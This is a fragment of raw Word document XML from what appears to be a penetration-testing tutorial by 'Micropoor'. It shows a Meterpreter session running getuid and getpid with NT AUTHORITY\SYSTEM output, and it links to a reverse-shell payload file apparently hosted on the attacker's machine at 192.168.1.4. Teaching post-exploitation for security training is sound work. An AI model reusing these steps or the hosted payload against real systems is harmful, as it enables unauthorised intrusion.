      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0500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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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NT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getpid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pid:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>728</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8182" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w: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315" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="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seFELayout/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3E94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 ?> 
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /> 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.4/Micropoor_rev_x86_msi_53.txt" TargetMode="External" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.4/Micropoor_rev_x86_msi_53.txt" TargetMode="External" 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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>